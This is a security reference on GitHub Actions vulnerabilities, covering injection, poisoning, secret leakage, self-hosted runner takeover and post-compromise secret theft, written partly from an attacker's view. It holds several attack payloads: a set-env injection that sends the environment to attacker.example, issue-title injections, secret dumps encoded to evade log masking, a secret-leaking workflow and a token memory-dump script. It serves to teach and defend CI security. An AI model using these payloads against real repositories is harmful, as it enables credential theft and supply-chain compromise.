GitHub Actions
Allowed unsecure commands
There are deprecated set-env and add-path workflow commands that can be explicitly enabled by setting the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable to true.
set-env sets environment variables via the following workflow command: ::set-env name=<NAME>::<VALUE>
add-path updates the PATH environment variable via the following workflow command: ::add-path::<VALUE>
Depending on the use of the environment variable, this could allow an attacker, in the worst case, to change the path and run a command other than the intended one, leading to arbitrary command execution. For example, consider the following workflow:
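A minimal sketch of such a workflow (the job layout, environment variable and deployment step are hypothetical reconstructions of what the text describes):

```yaml
name: deploy
on: pull_request_target

env:
  # explicitly re-enables the deprecated set-env/add-path commands
  ACTIONS_ALLOW_UNSECURE_COMMANDS: true

jobs:
  deploy:
    runs-on: ubuntu-latest
    env:
      ENVIRONMENT_NAME: staging
    steps:
      # prints the user-controlled github context to the log; the runner
      # scans log output for workflow commands like ::set-env::
      - name: Dump github context
        run: echo '${{ toJSON(github) }}'
      - uses: actions/github-script@v6
        with:
          # ENVIRONMENT_NAME is interpolated directly into JavaScript
          script: |
            console.log("Deploying to ${{ env.ENVIRONMENT_NAME }}")
```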
The above workflow enables unsecure commands by setting ACTIONS_ALLOW_UNSECURE_COMMANDS to true in the env section. As can be seen, the first step of the deploy job prints the github context to the workflow log. Since some of the variables in the github context are user-controlled, it is possible to abuse unsecure commands to set arbitrary environment variables. For instance, an attacker could use the pull request description to deliver the following payload, which will reset ENVIRONMENT_NAME when the github context is printed:
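A hypothetical payload placed in the pull request description might look like this (the injected JavaScript is illustrative; it assumes ENVIRONMENT_NAME is later interpolated into an actions/github-script step):

```
::set-env name=ENVIRONMENT_NAME::x"); require("child_process").execSync("env | curl -X POST --data-binary @- https://attacker.example"); //
```

When the github context is echoed to the log, the runner interprets this line as a set-env workflow command.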
GitHub Runner will process this line as a workflow command and save a malicious payload to ENVIRONMENT_NAME. As a result, injecting the ENVIRONMENT_NAME variable within the actions/github-script step will lead to code injection.
References:
Artifact poisoning
There are many different cases where workflows use artifacts created by other workflows, for example, to get test results, a compiled binary, metrics, changes made, a pull request number, etc. This opens up another source for payload delivery. As a result, if an attacker can control the content of the downloaded artifacts and that content is not properly validated, it may lead to the execution of arbitrary commands. For example, consider the following workflows:
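Sketches of the two workflows described below (the build commands, artifact names, and the cross-workflow download action are illustrative assumptions):

```yaml
# .github/workflows/pr.yml
name: pr
on: pull_request
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # builds a binary from the (potentially malicious) PR code
      - run: make build
      - uses: actions/upload-artifact@v4
        with:
          name: binary
          path: ./bin/app
```

```yaml
# .github/workflows/run.yml
name: run
on: workflow_dispatch
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      # downloads the artifact produced by pr.yml via a third-party
      # cross-workflow download action, then runs it
      - uses: dawidd6/action-download-artifact@v3
        with:
          workflow: pr.yml
          name: binary
      - run: chmod +x ./app && ./app
```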
As can be seen, the first workflow uses the pull_request event to build a binary from an incoming pull request and upload the compiled binary to the artifacts. Since the workflow uses pull_request, it can be triggered by a third-party user from a fork. Therefore, it is possible to upload a malicious binary to the artifacts. The second workflow uses the workflow_dispatch event, downloads the binary from the pr.yml workflow, and runs it. Even though the run.yml workflow is triggered manually, an attacker could execute arbitrary commands if they poisoned the artifacts just before triggering run.yml. In this case, the attack flow can look like this:
1. An attacker forks the repository and makes malicious changes.
2. The attacker opens a pull request to the base repository.
3. The pr.yml workflow checks out the code from the pull request, builds it, and uploads the malicious binary to the artifacts.
4. A maintainer triggers the run.yml workflow.
5. The workflow downloads the malicious binary and runs it.
References:
How to detect downloading artifacts?
There are several ways to download artifacts from another workflow. The most common ones can be found below:
Using the github.rest.actions.listWorkflowRunArtifacts() method within the actions/github-script action.
Using the gh run download GitHub CLI command.
Using the gh api GitHub CLI command with github.event.workflow_run.artifacts_url.
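Illustrative snippets for each pattern (artifact and workflow names are hypothetical):

```yaml
# 1. actions/github-script
- uses: actions/github-script@v6
  with:
    script: |
      const artifacts = await github.rest.actions.listWorkflowRunArtifacts({
        owner: context.repo.owner,
        repo: context.repo.repo,
        run_id: context.payload.workflow_run.id,
      });

# 2. gh run download
- run: gh run download ${{ github.event.workflow_run.id }} -n binary
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

# 3. gh api with the artifacts URL
- run: gh api ${{ github.event.workflow_run.artifacts_url }}
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
```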
Cache poisoning
The GitHub Actions cache is shared between workflows within a repository. As a result, whatever is cached from an incoming pull request will be available in all workflows. You can reproduce this behaviour using the steps below.
Poisoning:
1. Create a workflow in a base repository with the following content:
2. Fork the repository and add a poison file with arbitrary content.
3. Create a pull request to the base repository and wait for the workflow to complete.
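The base-repository workflow from step 1 might look like this sketch (the static cache key and cached path are assumptions; any key that later runs also restore would work):

```yaml
name: cache
on: pull_request
jobs:
  cache:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # a static key means every run restores and saves the same
      # cache entry, including one populated from a fork's PR
      - uses: actions/cache@v3
        with:
          path: poison
          key: shared-cache
```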
Exploitation:
1. Create a new branch in the base repository and change any file.
2. Create a pull request to the base branch.
3. The workflow will retrieve the poison file from step 2 of the Poisoning section above.
Cache and deployment environments
GitHub Runner registration token disclosure
The GitHub Runner registration token is a short-term token with a one-hour expiration time; it looks like this:
In the case of a GitHub Runner registration token disclosure, an attacker can register a malicious runner, take over jobs, and gain full access to secrets and code.
You can use the following request to check a registration token:
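One way to check a registration token is to replay the request the official runner sends during registration; the endpoint and RemoteAuth authorization scheme below are what the runner's configuration step uses (a sketch, with placeholders):

```shell
curl -X POST https://api.github.com/actions/runner-registration \
  -H "Authorization: RemoteAuth <REGISTRATION_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"url": "https://github.com/<OWNER>/<REPO>", "runner_event": "register"}'
```

A valid token returns runner service credentials; an expired one returns an error.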
Disclosure of sensitive data
References:
Printing sensitive output to workflow logs
The following example prints sensitive data received from the /user endpoint:
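A sketch of such a step (the PAT secret name is a hypothetical); the /user JSON response, including fields like the user's email, is written straight to the workflow log:

```yaml
- name: Get current user
  run: |
    # the full JSON response is printed to the workflow log
    curl -s -H "Authorization: token ${{ secrets.PAT }}" \
      https://api.github.com/user
```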
Running commands in the verbose or debug mode
The following example leaks the Auth-Token header due to the curl verbose flag -v:
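A sketch of such a step (header name, secret name and endpoint are hypothetical); -v makes curl print the outgoing request headers, including the token:

```yaml
- name: Call internal API
  run: |
    # -v prints request headers, including Auth-Token, to the log
    curl -v -H "Auth-Token: ${{ secrets.API_TOKEN }}" \
      https://api.example.com/v1/status
```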
Misuse of sensitive data in workflows
The following example does not mark TOKEN as sensitive using add-mask, so curl will expose the TOKEN in the logs:
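A sketch under the assumption that the token is fetched at runtime (endpoint names are hypothetical). Because the runner only masks values registered with ::add-mask::, the dynamically obtained token appears in the verbose output in plain text:

```yaml
- name: Deploy
  run: |
    TOKEN=$(curl -s https://auth.example.com/token)
    # no `echo "::add-mask::$TOKEN"` here, so the runner cannot
    # mask the value when curl's verbose output prints the URL
    curl -v "https://api.example.com/deploy?token=$TOKEN"
```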
In the snippet below, an attacker could use the pull request description to deliver a payload and stop workflow command processing, which will cause the token to be exposed despite add-mask being used.
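A sketch of such a vulnerable snippet (endpoint names hypothetical). The user-controlled pull request body is echoed before the mask is registered, so an attacker can disable command processing first:

```yaml
- name: Get token
  run: |
    # user-controlled data is printed before ::add-mask:: runs
    echo 'PR body: ${{ github.event.pull_request.body }}'
    TOKEN=$(curl -s https://auth.example.com/token)
    echo "::add-mask::$TOKEN"
    echo "Using token: $TOKEN"   # normally rendered as ***
```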
The payload may look like this:
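A hypothetical pull request description delivering the attack. Once the runner processes ::stop-commands::, all subsequent workflow commands, including ::add-mask::, are ignored until the chosen end token resumes processing, so the token printed later is not masked:

```
A perfectly normal pull request description.
::stop-commands::arbitrary-end-token
```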
Misuse of secrets in reusable workflows
When a job is used to call a reusable workflow, jobs.<job_id>.secrets can be used to provide a map of secrets that are passed to the called workflow. Under certain circumstances, the misuse of secrets can lead to the disclosure of sensitive data.
Consider the following workflows:
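Sketches of the two workflows described below (file layout and the fromJSON-based parsing are assumptions consistent with the text):

```yaml
# .github/workflows/dispatch.yml
name: dispatch
on: workflow_dispatch
jobs:
  call:
    uses: ./.github/workflows/reusable.yml
    secrets:
      creds: '{"AWS_ACCESS_KEY_ID":"${{ secrets.AWS_ACCESS_KEY_ID }}","AWS_SECRET_ACCESS_KEY":"${{ secrets.AWS_SECRET_ACCESS_KEY }}"}'
```

```yaml
# .github/workflows/reusable.yml
name: reusable
on:
  workflow_call:
    secrets:
      creds:
        required: true
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      # only secrets.creds as a whole is known to the runner as a
      # secret; the substrings extracted with fromJSON are not, so
      # any log output containing them shows the values unmasked
      - run: |
          aws configure set aws_access_key_id ${{ fromJSON(secrets.creds).AWS_ACCESS_KEY_ID }}
          aws configure set aws_secret_access_key ${{ fromJSON(secrets.creds).AWS_SECRET_ACCESS_KEY }}
```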
The dispatch.yml workflow invokes the reusable.yml reusable workflow and passes AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY using the creds secret. The reusable.yml workflow parses the creds secret and extracts AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY. Even though ${{ secrets.creds }} is masked in the logs, and AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY are stored in encrypted secrets, reusable.yml will reveal the ID and key in plain text.
Below you can find one of the in-the-wild examples, where the docker/build-push-action parses the npm credentials from the build_args and leaks them into the logs:
Misuse of secrets in manual workflows
If a workflow_dispatch workflow receives secrets in the inputs context and does not mask them, the secrets will most likely leak into the workflow log.
For example, the following workflow gets a token from the inputs context and reveals that token in the workflow log by passing the token to environment variables:
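A sketch of such a workflow (input and script names are hypothetical). Unlike secrets, workflow_dispatch inputs are not masked and are also visible in the run's event payload:

```yaml
name: manual-deploy
on:
  workflow_dispatch:
    inputs:
      token:
        description: Access token
        required: true
jobs:
  deploy:
    runs-on: ubuntu-latest
    env:
      # inputs are not treated as secrets, so the value is not
      # masked anywhere it appears in the log
      TOKEN: ${{ inputs.token }}
    steps:
      - run: ./deploy.sh   # hypothetical script consuming $TOKEN
```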
Output parameters and debug mode
The following example will leak the tokens into the workflow logs if the debug mode is enabled:
The workflow log discloses the token in plaintext:
Workflow artifacts
Workflow cache
Contexts misusing
The list below contains user-controlled GitHub context variables for various events.
The outputs property contains the result/output of a specific job or step. outputs may accept user-controlled data, which can be passed to the run: block. In the following example, an attacker can execute arbitrary commands by creating a pull request named `;arbitrary_command_here();// because steps.fetch-branch-names.outputs.prs-string contains a pull request title:
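A sketch of the vulnerable pattern (the step collecting titles is a hypothetical reconstruction): a step stores pull request titles in an output, and a later actions/github-script step interpolates that output directly into JavaScript:

```yaml
jobs:
  process-prs:
    runs-on: ubuntu-latest
    steps:
      - id: fetch-branch-names
        name: Fetch branch names
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          # collects user-controlled PR titles into a step output
          prs=$(gh pr list --json title --jq '.[].title' | tr '\n' ',')
          echo "prs-string=$prs" >> "$GITHUB_OUTPUT"
      - uses: actions/github-script@v6
        with:
          # the attacker-controlled title is interpolated directly
          # into the JavaScript source before it is executed
          script: |
            const prs = "${{ steps.fetch-branch-names.outputs.prs-string }}";
            console.log(prs);
```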
References:
Potentially dangerous third-party actions
Remember that injecting user-controlled data into variables of third-party actions can lead to vulnerabilities such as command or code injection. Below you can find a list of the most common actions which, if misused, can lead to vulnerabilities.
Write workflows scripting the GitHub API in JavaScript. Using variable interpolation ${{ }} with script: can lead to JavaScript code injection.
A GitHub Action to send queries to GitHub's GraphQL API. Using variable interpolation ${{ }} with query: can lead to injection into a GraphQL request.
A GitHub Action to send arbitrary requests to GitHub's REST API. Using variable interpolation ${{ }} with route: can lead to injection into a request to the REST API.
Misconfiguration of OpenID Connect
With OpenID Connect, a GitHub Actions workflow requires a token to access resources in a cloud provider. The workflow requests an access token from the cloud provider, which checks the details presented in the JWT. If the JWT matches the trust configuration, the cloud provider responds by issuing a temporary token to the workflow, which can then be used to access resources in the cloud provider.
When developers configure a cloud to trust GitHub's OIDC provider, they must add conditions that filter incoming requests, so that untrusted repositories or workflows can't request access tokens for cloud resources. The Audience and Subject claims are typically used in combination while setting conditions on the cloud role/resources to scope its access to the GitHub workflows.
Audience: by default, this value uses the URL of the organization or repository owner. This can be used to set a condition that only the workflows in the specific organization can access the cloud role.
Subject: has a predefined format and is a concatenation of some of the key metadata about the workflow, such as the GitHub organization, repository, branch or associated job environment. There are also many additional claims supported in the OIDC token that can be used for setting these conditions.
However, if a cloud provider is misconfigured, untrusted repositories can request access tokens for cloud resources.
References:
Misuse of the events related to incoming pull requests
GitHub workflows can be triggered by events related to incoming pull requests. The table below contains all the events that can be used to handle incoming pull requests:
| Event | REF | Possible GITHUB_TOKEN permissions | Access to secrets |
| --- | --- | --- | --- |
| pull_request | PR merge branch | read | no |
| pull_request (from a branch in the same repository) | PR merge branch | write | yes |
| pull_request_target | PR base branch | write | yes |
| issue_comment | Default branch | write | yes |
| workflow_run | Default branch | write | yes |
Workflows triggered via pull_request_target have write permissions to the target repository and have access to target repository secrets. The same is true for workflows triggered on pull_request from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user already has write permissions to the target repository. pull_request_target runs in the context of the target repository of the pull request, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of user-supplied code.
Normally, using pull_request_target, issue_comment or workflow_run is safe because actions only run code from the target repository, not the incoming pull request. However, if a workflow uses these events with an explicit checkout of a pull request, it can lead to untrusted command or code execution.
There are several ways to check out a code from a pull request:
Explicitly checking out the pull request using git in the run: block.
Using the GitHub API or third-party actions.
The following context variables may help to find cases where an incoming pull request is checked out:
References:
Confusion between head.ref and head.sha
Sometimes developers implement workflows in such a way that they require manual review before execution. It is guaranteed that untrusted content will be reviewed by a maintainer before execution. Consider the following workflow:
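A sketch of such a workflow, consistent with the description that follows (label name and build command are hypothetical):

```yaml
name: test-approved
on:
  pull_request_target:
    types: [labeled]
jobs:
  build:
    if: contains(github.event.pull_request.labels.*.name, 'approved')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          repository: ${{ github.event.pull_request.head.repo.full_name }}
          # checks out the branch, i.e. whatever it points to *now*,
          # not the commit that was actually reviewed
          ref: ${{ github.event.pull_request.head.ref }}
      - run: make test   # hypothetical build/test command
```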
As can be seen, the workflow is triggered when the approved label is set on a pull request. In other words, only a maintainer with write permissions can trigger this workflow. However, the workflow is still vulnerable, because it uses github.event.pull_request.head.ref to check out the repository content. Consider the difference between head.ref and head.sha: head.ref points to a branch, while head.sha points to a commit. This means that if head.sha is used to check out a repository, the content will be fetched from the commit that triggered the workflow. In the case of labeling a pull request, that is the HEAD commit a maintainer reviewed before setting the label. However, if head.ref is used, the repository is checked out from the head branch of the pull request, i.e. whatever commit that branch currently points to. As a result, an attacker can inject a malicious payload right after the manual approval (a TOCTOU attack). The attack flow may look like this:
1. An attacker forks a target repository.
2. The attacker makes valid changes and opens a pull request.
3. The attacker waits for the label to be set.
4. A maintainer sets the approved label, triggering the vulnerable workflow.
5. The attacker pushes a malicious payload to the fork.
6. The workflow checks out the malicious payload and executes it.
Misuse of the pull_request_target event in non-default branches
The pull_request_target event can be used to trigger workflows in non-default branches if there is no restriction based on the branches and branches-ignore filters.
GitHub uses the workflow from a non-default branch when creating a pull request to that branch. Therefore, if there is a vulnerable workflow in a non-default branch that can be triggered by the pull_request_target event, an attacker can open a pull request to that branch and exploit the vulnerability.
This is a common pitfall when fixing vulnerabilities: developers may fix a vulnerability only in the default branch and leave the vulnerable version in non-default branches.
Misuse of the workflow_run event
Workflows triggered by the workflow_run event run in the context of the default branch with access to secrets, so they do not execute code from the incoming pull request directly. Nevertheless, there are still ways of transferring user-controlled data from untrusted pull requests into a privileged workflow_run workflow context:
References:
Misuse of self-hosted runners
A self-hosted runner can be registered as ephemeral, in which case it handles at most one job before being removed. As a result, an ephemeral runner has the following lifecycle:
1. The runner is registered with the GitHub Actions service.
2. The runner takes one job and performs it.
3. When the runner completes the job, it cleans up the local environment (the .runner, .credentials and .credentials_rsaparams files).
4. The GitHub Actions service automatically de-registers the runner.
Therefore, if an attacker gains access to an ephemeral self-hosted runner, they will not be able to affect other jobs.
However, self-hosted runners are not launched as ephemeral by default and there is no guarantee around running in an ephemeral clean virtual environment. So, runners can be persistently compromised by untrusted code in a workflow. An attacker can abuse a workflow to access the following files that are stored in a root folder of a runner host:
.runner, which contains general info about a runner, such as an id, name, pool id, etc.
.credentials, which contains authentication details such as the scheme used and the authorization URL.
.credentials_rsaparams, which contains the RSA parameters that were generated during the registration and are used to sign JWT tokens.
These files can be used to take over a self-hosted runner with the following steps:
1. Fetch the .runner, .credentials and .credentials_rsaparams files with all the necessary data written during the runner registration.
2. Get an access token using the following request:
Where:
- UUID can be found in the .credentials file.
3. Remove the current session:
Where:
- RANDOM_PREFIX can be found in the .runner file.
- SESSION_ID is a session ID that can be found in the _diag/Runner_<DATE>-utc.log file with the runner logs.
- BEARER_TOKEN is a bearer token from the response in the previous step.
4. Copy the .runner, .credentials and .credentials_rsaparams files to the root folder of a malicious runner.
5. Run the malicious runner.
The takeover has the greatest impact when a self-hosted runner is defined at the organization or enterprise level because GitHub can schedule workflows from multiple repositories onto the same runner. It allows an attacker to gain access to the jobs which will use the malicious runner.
References:
Using the pull_request event with self-hosted runners
References:
Detection of the use of self-hosted runners
Self-hosted runners can be recognized by the labels used in the runs-on: key:
self-hosted: the default label applied to all self-hosted runners.
linux, windows, or macOS: applied depending on the operating system.
x64, ARM, or ARM64: applied depending on the hardware architecture.
Using vulnerable actions
There are three types of actions:
Composite action
Command injection
As a result, it is possible to at least extract secrets from environment variables and generated shell scripts. For instance, in the snippet below an attacker can open an issue with the title ";{cat,/home/runner/work/_temp/$({xxd,-r,-p}<<<2a)}|{base64,-w0};# to dump GITHUB_TOKEN:
Disclosure of sensitive data
JavaScript action
Command injection
Disclosure of sensitive data
The workflow log discloses the token in plaintext:
GitHub context
The following variables in the GitHub context are controlled by a user:
context.payload.pull_request.title
context.payload.pull_request.body
context.payload.pull_request.head.ref
context.payload.pull_request.head.label
context.payload.pull_request.head.repo.default_branch
context.payload.pull_request.head.repo.description
context.payload.pull_request.head.repo.homepage
context.payload.issue.body
context.payload.issue.title
context.payload.comment.body
context.payload.discussion.body
context.payload.discussion.title
These variables can be used as a source to pass arbitrary data to vulnerable code.
Octokit GraphQL API injection
Octokit REST API injection
Docker action
Disclosure of sensitive data
Using a malicious docker image
In addition to a local Dockerfile in a repository, third-party Docker images from a registry can be used. These Docker images may be vulnerable or malicious, causing the container to be compromised.
References:
Sensitive mounts
GitHub Runner passes part of the environment variables and mounts volumes when running a Docker container:
Here it is worth paying attention to at least the following things:
Unclaimed actions
Third-party actions may be available for claiming because the namespace (username or organization name) has been changed or removed. If the namespace has been changed GitHub will redirect the old namespace to the new one and thus workflows that use the actions with the old namespace will continue to execute successfully. In this case, an attacker can try to claim the old namespace by registering a user or creating an organization. If it is possible, an attacker can create a malicious action which will later be executed by workflows that use actions with the claimed namespace.
References:
Reusing vulnerable workflows
The reusable workflow from the snippet above is vulnerable to command injection. If the username input variable is controlled by an attacker, they can leak envPAT using the following payload as username:
Another example is the following workflow, which checks out the code from an incoming PR and runs npm install against it:
References:
Vulnerable if-conditions
The if condition is used in a workflow file to determine whether a step should run. When an if conditional is true, the step will run. It can be useful from a security perspective as well. For example, the following if statement can be used to allow only pull requests from the base repository:
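A condition along these lines (a minimal sketch):

```yaml
if: github.event.pull_request.head.repo.full_name == github.repository
```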
However, these if conditions can be vulnerable and lead to behavior other than what was originally intended.
Incorrect comparison
GitHub provides the contains() function, which can be used in an if condition incorrectly. For instance, in the following example, an author has restricted the execution of the step to bots only using contains():
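A sketch of such a condition:

```yaml
# matches ANY actor whose login contains the substring "bot"
if: contains(github.actor, 'bot')
```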
However, this condition can be easily met by creating a new bot.
Labels on PRs
One approach to control the workflow execution is to use labels on pull requests. This is possible because a label on a pull request can only be set by a project member. As a result, it allows running a workflow only after a project member has reviewed a pull request and set an appropriate label. However, this approach is vulnerable to a TOCTOU attack:
1. Create a pull request with valid changes.
2. Wait for the label to be set.
3. Update the pull request with malicious code.
4. The update will trigger the workflow.
Misusing context variables
Using wrong context variables can cause an if condition to always be true or false regardless of the situation. For example, the following if condition uses the github.event.pull_request.base.repo.full_name variable instead of github.event.pull_request.head.repo.full_name to ignore pull requests from forks:
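A sketch of the broken check (the repository name is a placeholder); base.repo always refers to the target repository, never the fork:

```yaml
if: github.event.pull_request.base.repo.full_name == 'org/repo'
```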
However, this condition will always be true, because base.repo refers to the target repository itself. The same behaviour occurs if github.repository is used for comparing against the repository name:
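A sketch of this equally broken variant; both sides always name the target repository:

```yaml
if: github.event.pull_request.base.repo.full_name == github.repository
```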
Skipping mandatory checks
A workflow can implement various types of checks during running. For example, it can check if an actor is a member of an organization or if they have write permissions for the current repository. This can be done using third-party actions or a custom validation based on the GitHub API. However, not all such actions interrupt execution if a check fails, some of them return a boolean value for subsequent verification. For instance, the following snippet shows a check for the presence of an actor in an org team:
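A sketch of such a check (the action name, inputs and outputs are hypothetical; what matters is that the membership action only returns a boolean output):

```yaml
- name: Fetch team member list
  uses: example/get-team-membership@v2   # hypothetical action
  with:
    username: ${{ github.actor }}
    team: admins
    GITHUB_TOKEN: ${{ secrets.PAT }}
- name: Stop if not a team member
  if: ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
  run: exit 1
```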
Nevertheless, the snippet above is vulnerable because there is no id: field for the Fetch team member list step. As a result, ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }} is always false. So, the fixed version looks like the following:
Unclaimed or incorrect usernames
If the workflow uses something like this:
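For example, a condition pinned to specific usernames (the username is a placeholder):

```yaml
if: github.actor == 'some-maintainer'
```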
Make sure all these users exist; the accounts may have been deleted, or the usernames misspelled.
The potential impact of a compromised runner workflow
References:
Accessing secrets through environment variables
If secrets are passed to an environment variable, you can directly access them in the following ways:
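For example, dumping the whole environment; encoding the output defeats the runner's log masking, which only matches the exact secret values (a sketch):

```shell
# double-base64 so no masked substring appears in the log
env | base64 -w0 | base64 -w0
```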
Accessing secrets from the run: step
If a secret is used directly in an expression ${{ }} in the run: block, like:
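A sketch of such a step (script and secret names are hypothetical):

```yaml
- run: ./deploy.sh --token ${{ secrets.DEPLOY_TOKEN }}
```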
the generated shell script will be stored on disk in the /home/runner/work/_temp/ folder. This script contains the secret in plain text, because GitHub Runner evaluates the expressions inside ${{ }} and substitutes them with the resulting values before running the script in the run: block. Therefore, the secret can be accessed with the following command:
Accessing secrets through rewriting third-party actions
If you have arbitrary command execution in front of a third-party action that handles secrets, you can steal secrets by rewriting the third-party action code. GitHub Runner checks out all third-party action repositories during the Set up step and saves them to the /home/runner/work/_actions/ folder. For example, fakeaction/publish@v3 will be checked out to the /home/runner/work/_actions/fakeaction/publish/v3/ folder. Therefore, you can rewrite a third-party action with a malicious one using command injection to access secrets.
The easiest way is to override the action.yml file with a composite action that leaks secrets:
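A sketch of such a replacement action.yml, reusing the fakeaction/publish example above (the token input name is hypothetical):

```yaml
# written to /home/runner/work/_actions/fakeaction/publish/v3/action.yml
name: publish
description: malicious replacement
inputs:
  token:
    required: true
runs:
  using: composite
  steps:
    - shell: bash
      run: |
        # encode so the runner's log masking does not hide the values
        echo "${{ inputs.token }}" | base64 -w0
        env | base64 -w0
```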
Leaking repository and organization secrets by adding a malicious workflow
GitHub no longer allows modifying files in the .github/workflows folder, or merging a branch from a fork with changes in the .github/workflows folder, using GITHUB_TOKEN. You need a personal access token with the repo and workflow scopes to be able to add a malicious workflow.
Usually, non-default branches have no branch protection rules. If you have access to a GITHUB_TOKEN with the pull_requests:write scope, you can add an arbitrary workflow to a non-default branch. Since a pull_request_target workflow in non-default branches can be triggered by a user, you can leak all repository and organization secrets using the following steps:
1. Fork the target repo.
2. Add a malicious pull_request_target workflow:
3. Create a pull request to a non-default branch.
4. Merge the pull request using GITHUB_TOKEN with the pull_requests:write scope:
5. After merging the pull request, open a pull request to the non-default branch from the fork.
6. Wait for the malicious workflow to complete. It will leak all secrets to the logs.
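The malicious workflow from step 2 might look like this sketch; toJSON(secrets) expands every repository and organization secret, and the base64 encoding defeats log masking:

```yaml
name: leak
on: pull_request_target
jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - run: echo '${{ toJSON(secrets) }}' | base64 -w0 | base64 -w0
```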
If GITHUB_TOKEN has the contents:write scope, you can create a new non-default branch using the following API request:
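The standard "create a git reference" API call can be used for this; OWNER, REPO, the branch name and the commit SHA are placeholders:

```shell
curl -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/git/refs \
  -d '{"ref": "refs/heads/<NEW_BRANCH>", "sha": "<EXISTING_COMMIT_SHA>"}'
```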
Exfiltrating secrets from a runner
An attacker can exfiltrate any stored secrets or other data from a runner. Actions and scripts may store sensitive data on the filesystem:
.git/config: the actions/checkout action by default stores the repository token in the .git/config file unless the persist-credentials: false argument is set.
$HOME/.jira.d/credentials
$HOME/.azure: the Azure/login action by default uses the Azure CLI for login, which stores the credentials in the $HOME/.azure folder.
$HOME/.docker/config.json: Docker registry login actions store registry credentials in this file.
$GITHUB_WORKSPACE/gha-creds-<RANDOM_FILENAME>.json
$HOME/.terraformrc
Exfiltrating secrets from memory
Any secrets that are used by a workflow are passed to the GitHub Runner at startup; therefore secrets are placed in the process's memory. You can try to exfiltrate secrets from the memory dump.
You can use the following script to dump the memory and find GITHUB_TOKEN:
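A sketch of such a script, assuming sudo access on the runner host; it dumps the Runner.Worker process and greps for token-like strings (workflow GITHUB_TOKEN installation tokens start with ghs_):

```shell
# dump the memory of the Runner.Worker process
sudo gcore -o /tmp/memdump "$(pgrep -f Runner.Worker | head -n1)"
# search the dump for GitHub installation tokens
strings /tmp/memdump.* | grep -aoE 'ghs_[0-9A-Za-z]{30,}' | sort -u
```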
Approving pull requests
A workflow can grant its GITHUB_TOKEN write permission on the pull requests API endpoint and use the API to approve a pull request. This can be used to bypass branch protection rules when a main branch requires one approval and does not require a review from code owners.
For instance, if you can write to non-main branches of a repository, you can bypass the protection using the following steps:
1. Create a branch and add the following workflow:
2. Create a pull request.
3. The pull request will require approval.
4. Once the action is complete, the github-actions bot will approve the changes.
5. You can merge the changes to the main branch.
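The workflow from step 1 might look like this sketch, using the standard pull request reviews API:

```yaml
name: approve
on: pull_request
permissions:
  pull-requests: write
jobs:
  approve:
    runs-on: ubuntu-latest
    steps:
      # the github-actions bot approves its own pull request
      - run: |
          curl -X POST \
            -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github+json" \
            "https://api.github.com/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}/reviews" \
            -d '{"event": "APPROVE"}'
```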
Modifying the contents of a repository
References:
Access cloud services via OpenID Connect
If a vulnerable workflow has a GITHUB_TOKEN with the id-token:write scope, you can request the OIDC JWT ID token to access cloud resources.
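Inside such a job, the token can be requested using the environment variables the runner provides for this purpose; the audience value below is an example for AWS:

```shell
curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com"
```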
References:
Trigger workflow_dispatch workflows
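A workflow_dispatch workflow can be triggered with the standard GitHub REST API call; OWNER, REPO, WORKFLOW_ID and the inputs are placeholders:

```shell
curl -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/actions/workflows/<WORKFLOW_ID>/dispatches \
  -d '{"ref": "main", "inputs": {"name": "value"}}'
```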
In the request above, you can control workflow arguments using the inputs parameter. If a workflow does not properly handle data from the inputs context, you might get command execution.
References:
Trigger repository_dispatch workflows
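A repository_dispatch workflow can be triggered with the standard GitHub REST API call; OWNER, REPO, the event type and the payload are placeholders:

```shell
curl -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/dispatches \
  -d '{"event_type": "custom-event", "client_payload": {"name": "value"}}'
```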
In the request above, you can control workflow arguments using the client_payload parameter. If a workflow does not properly handle data from the github.event.client_payload context, you might get command execution.
References: